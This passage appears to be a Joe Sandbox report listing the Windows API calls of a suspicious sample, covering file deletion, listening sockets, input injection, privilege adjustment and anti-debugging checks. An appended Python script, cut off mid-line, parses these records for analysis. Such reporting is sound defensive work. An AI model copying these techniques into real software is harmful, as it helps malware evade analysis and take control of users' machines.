                                • FindNextFileW.KERNEL32(00000000,?), ref: 001C96D3
                                • FindClose.KERNEL32(00000000), ref: 001C96DE
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 001C96FA
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C974A
                                • SetCurrentDirectoryW.KERNEL32(00216B7C), ref: 001C9768
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C9772
                                • FindClose.KERNEL32(00000000), ref: 001C977F
                                • FindClose.KERNEL32(00000000), ref: 001C978F
                                Similarity
                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1409584000-438819550
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001C97BE
                                • FindNextFileW.KERNEL32(00000000,?), ref: 001C9819
                                • FindClose.KERNEL32(00000000), ref: 001C9824
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 001C9840
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C9890
                                • SetCurrentDirectoryW.KERNEL32(00216B7C), ref: 001C98AE
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001C98B8
                                • FindClose.KERNEL32(00000000), ref: 001C98C5
                                • FindClose.KERNEL32(00000000), ref: 001C98D5
                                  • Part of subcall function 001BDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001BDB00
                                Similarity
                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                • String ID: *.*
                                • API String ID: 2640511053-438819550
                                APIs
                                • GetLocalTime.KERNEL32(?), ref: 001C8257
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001C8267
                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001C8273
                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001C8310
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8324
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8356
                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001C838C
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 001C8395
                                Similarity
                                • API ID: CurrentDirectoryTime$File$Local$System
                                • String ID: *.*
                                • API String ID: 1464919966-438819550
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BD122
                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 001BD1DD
                                • MoveFileW.KERNEL32(?,?), ref: 001BD1F0
                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 001BD20D
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001BD237
                                  • Part of subcall function 001BD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,001BD21C,?,?), ref: 001BD2B2
                                • FindClose.KERNEL32(00000000,?,?,?), ref: 001BD253
                                • FindClose.KERNEL32(00000000), ref: 001BD264
                                Similarity
                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                • String ID: \*.*
                                • API String ID: 1946585618-1173974218
                                APIs
                                Similarity
                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                • String ID:
                                • API String ID: 1737998785-0
                                APIs
                                  • Part of subcall function 001B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                  • Part of subcall function 001B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                  • Part of subcall function 001B16C3: GetLastError.KERNEL32 ref: 001B174A
                                • ExitWindowsEx.USER32(?,00000000), ref: 001BE932
                                Similarity
                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                • String ID: $ $@$SeShutdownPrivilege
                                • API String ID: 2234035333-3163812486
                                APIs
                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 001D1276
                                • WSAGetLastError.WSOCK32 ref: 001D1283
                                • bind.WSOCK32(00000000,?,00000010), ref: 001D12BA
                                • WSAGetLastError.WSOCK32 ref: 001D12C5
                                • closesocket.WSOCK32(00000000), ref: 001D12F4
                                • listen.WSOCK32(00000000,00000005), ref: 001D1303
                                • WSAGetLastError.WSOCK32 ref: 001D130D
                                • closesocket.WSOCK32(00000000), ref: 001D133C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$closesocket$bindlistensocket
                                • String ID:
                                • API String ID: 540024437-0
                                APIs
                                • _free.LIBCMT ref: 0018B9D4
                                • _free.LIBCMT ref: 0018B9F8
                                • _free.LIBCMT ref: 0018BB7F
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001F3700), ref: 0018BB91
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0022121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0018BC09
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00221270,000000FF,?,0000003F,00000000,?), ref: 0018BC36
                                • _free.LIBCMT ref: 0018BD4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                APIs
                                  • Part of subcall function 00153AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00153A97,?,?,00152E7F,?,?,?,00000000), ref: 00153AC2
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BD420
                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 001BD470
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 001BD481
                                • FindClose.KERNEL32(00000000), ref: 001BD498
                                • FindClose.KERNEL32(00000000), ref: 001BD4A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                • String ID: \*.*
                                • API String ID: 2649000838-1173974218
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                • API String ID: 4168288129-2761157908
                                APIs
                                • _wcslen.LIBCMT ref: 001C64DC
                                • CoInitialize.OLE32(00000000), ref: 001C6639
                                • CoCreateInstance.OLE32(001EFCF8,00000000,00000001,001EFB68,?), ref: 001C6650
                                • CoUninitialize.OLE32 ref: 001C68D4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                • String ID: .lnk
                                • API String ID: 886957087-24824748
                                APIs
                                • GetForegroundWindow.USER32(?,?,00000000), ref: 001D22E8
                                  • Part of subcall function 001CE4EC: GetWindowRect.USER32(?,?), ref: 001CE504
                                • GetDesktopWindow.USER32 ref: 001D2312
                                • GetWindowRect.USER32(00000000), ref: 001D2319
                                • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 001D2355
                                • GetCursorPos.USER32(?), ref: 001D2381
                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001D23DF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                • String ID:
                                • API String ID: 2387181109-0
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001C9B78
                                • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001C9C8B
                                  • Part of subcall function 001C3874: GetInputState.USER32 ref: 001C38CB
                                  • Part of subcall function 001C3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C3966
                                • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001C9BA8
                                • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001C9C75
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                • String ID: *.*
                                • API String ID: 1972594611-438819550
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00169A4E
                                • GetSysColor.USER32(0000000F), ref: 00169B23
                                • SetBkColor.GDI32(?,00000000), ref: 00169B36
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$LongProcWindow
                                • String ID:
                                • API String ID: 3131106179-0
                                APIs
                                  • Part of subcall function 001D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                  • Part of subcall function 001D304E: _wcslen.LIBCMT ref: 001D309B
                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001D185D
                                • WSAGetLastError.WSOCK32 ref: 001D1884
                                • bind.WSOCK32(00000000,?,00000010), ref: 001D18DB
                                • WSAGetLastError.WSOCK32 ref: 001D18E6
                                • closesocket.WSOCK32(00000000), ref: 001D1915
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                • String ID:
                                • API String ID: 1601658205-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                • String ID:
                                • API String ID: 292994002-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                • API String ID: 0-1546025612
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001B82AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: ($tb!$|
                                • API String ID: 1659193697-4054476356
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 001DA6AC
                                • Process32FirstW.KERNEL32(00000000,?), ref: 001DA6BA
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • Process32NextW.KERNEL32(00000000,?), ref: 001DA79C
                                • CloseHandle.KERNEL32(00000000), ref: 001DA7AB
                                  • Part of subcall function 0016CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00193303,?), ref: 0016CE8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                • String ID:
                                • API String ID: 1991900642-0
                                APIs
                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001BAAAC
                                • SetKeyboardState.USER32(00000080), ref: 001BAAC8
                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001BAB36
                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001BAB88
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                APIs
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 001CCE89
                                • GetLastError.KERNEL32(?,00000000), ref: 001CCEEA
                                • SetEvent.KERNEL32(?,?,00000000), ref: 001CCEFE
                                Similarity
                                • API ID: ErrorEventFileInternetLastRead
                                • String ID:
                                • API String ID: 234945975-0
                                • Opcode ID: f2bda7f1f5815093911e0c6cde5d56d7d7f2cdbc154b883f0d9a066105f9a64d
                                • Instruction ID: f3dd7ab47a16324c9a616c4d148f51cfdbc35423217bfa8d4b534f5ebc07753e
                                • Opcode Fuzzy Hash: f2bda7f1f5815093911e0c6cde5d56d7d7f2cdbc154b883f0d9a066105f9a64d
                                • Instruction Fuzzy Hash: 3E21BD719003059BD720DFA5C988FAA7BF8EB61314F10841EE64AD6551E770EE45CBA0
                                APIs
                                • lstrlenW.KERNEL32(?,00195222), ref: 001BDBCE
                                • GetFileAttributesW.KERNEL32(?), ref: 001BDBDD
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BDBEE
                                • FindClose.KERNEL32(00000000), ref: 001BDBFA
                                Similarity
                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                • String ID:
                                • API String ID: 2695905019-0
                                • Opcode ID: 8ca1aac5982ec2a1784c3ff525446598cc6e5b3461bb71809edcd7d85cfb7ce7
                                • Instruction ID: c9b63c0114dc520e3fbedca63bea8d9aed94008bfbd053fa7e804c1cc7e91434
                                • Opcode Fuzzy Hash: 8ca1aac5982ec2a1784c3ff525446598cc6e5b3461bb71809edcd7d85cfb7ce7
                                • Instruction Fuzzy Hash: BAF0A0308109109782246BB8AC4E8AE3B6D9F06334B10470AF936C24E0FBB05D9686D5
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0018271A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00182724
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00182731
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 87c4ecdf8546e1b95c3ea30659d5f79569a847b4fd813c0876e129ec67fcf48b
                                • Instruction ID: 2e0e93659f5268022adf931b90bcf71c4fe7f2d16c43b9cb06fd36b2f5620cf3
                                • Opcode Fuzzy Hash: 87c4ecdf8546e1b95c3ea30659d5f79569a847b4fd813c0876e129ec67fcf48b
                                • Instruction Fuzzy Hash: D031B474951328ABCB21DF64DC8979DB7B8BF18310F5081EAE81CA7261E7309F818F45
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C51DA
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001C5238
                                • SetErrorMode.KERNEL32(00000000), ref: 001C52A1
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID:
                                • API String ID: 1682464887-0
                                • Opcode ID: e8e668b4601b23c38ce0f574e84d22a172d85f3a5361bcd5f7c4d69853ceca44
                                • Instruction ID: 765cc65b53c6edbaf20f4e4f7ae455fe4d61f71e1ba2a6f387c559e3cbd989ca
                                • Opcode Fuzzy Hash: e8e668b4601b23c38ce0f574e84d22a172d85f3a5361bcd5f7c4d69853ceca44
                                • Instruction Fuzzy Hash: 9A310975A00618DFDB00DF94D884EADBBF5FF59314F048099E805AF2A2DB31E85ACB91
                                APIs
                                  • Part of subcall function 0016FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00170668
                                  • Part of subcall function 0016FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00170685
                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                • GetLastError.KERNEL32 ref: 001B174A
                                Similarity
                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                • String ID:
                                • API String ID: 577356006-0
                                • Opcode ID: 94d2036cd7fb16b389652e10f09e4eb6d20296c460d0340bf5f61c74af9be33c
                                • Instruction ID: dc4db161f5a45bd7269fa87509e9129cad179ef4441af2565a9f268150a024c3
                                • Opcode Fuzzy Hash: 94d2036cd7fb16b389652e10f09e4eb6d20296c460d0340bf5f61c74af9be33c
                                • Instruction Fuzzy Hash: 991191B2404304BFD718AF94ECC6DABB7BDEB45714B21852EF45657681EB70BC428B60
                                APIs
                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD608
                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001BD645
                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD650
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle
                                • String ID:
                                • API String ID: 33631002-0
                                • Opcode ID: 72fe3e8a5982f03c42408e34d9e3032dc0a07cb69a7ed1a1128890ebd2fb647c
                                • Instruction ID: 7accb0fec2b4bf41894f3732a82e6eabbd09bab834b209508cd83eb0436649da
                                • Opcode Fuzzy Hash: 72fe3e8a5982f03c42408e34d9e3032dc0a07cb69a7ed1a1128890ebd2fb647c
                                • Instruction Fuzzy Hash: 86113C75E05228BBDB148F95AC85FEFBFBCEB45B50F108115F904E7290D7704A058BA1
                                APIs
                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001B168C
                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001B16A1
                                • FreeSid.ADVAPI32(?), ref: 001B16B1
                                Similarity
                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                • String ID:
                                • API String ID: 3429775523-0
                                • Opcode ID: c6644a2e5a34488b4a3a10b85e61d13284a20a88ecec5c5820418322c17872f2
                                • Instruction ID: f0c3502245d358522e38f40fb83de7eb29c0cabb3634b64058d89c4596c47703
                                • Opcode Fuzzy Hash: c6644a2e5a34488b4a3a10b85e61d13284a20a88ecec5c5820418322c17872f2
                                • Instruction Fuzzy Hash: FDF0F475950309FBDB00DFE49C89AAEBBBCFB08704F504565E501E6181E774AA448A90
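The API chains in the records above (the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple, the SetErrorMode-wrapped GetDiskFreeSpaceExW call, the CreateFileW / DeviceIoControl(002D1400) / CloseHandle sequence and the AllocateAndInitializeSid / CheckTokenMembership / FreeSid sequence) are what an analyst reads out of a listing like this. The Python script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses records in the report's own bullet format, tags each with a behaviour label, decodes the DeviceIoControl control code into its CTL_CODE fields, and rebuilds the SID handed to AllocateAndInitializeSid from its sub-authority arguments. The sample input is transcribed from the records above; the signature labels and notes, the one-entry IOCTL and SID lookup tables, and the NT identifier authority assumed for the SID (the report shows the authority pointer only as '?') are this example's own assumptions.

```python
import re
from collections import namedtuple

# Constructed input: four "APIs" records transcribed from the listing above.
SAMPLE_REPORT = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 0018271A
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00182724
• UnhandledExceptionFilter.KERNEL32(?), ref: 00182731
Memory Dump Source
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001C51DA
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001C5238
• SetErrorMode.KERNEL32(00000000), ref: 001C52A1
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001BD645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD650
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001B168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001B16A1
• FreeSid.ADVAPI32(?), ref: 001B16B1
"""

Call = namedtuple("Call", "api module args ref")  # args: raw hex strings, '?' = unresolved by the sandbox

# One bullet line of an "APIs" record, with or without an argument list and with the
# optional "Part of subcall function XXXX:" prefix the report uses for inlined callees.
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
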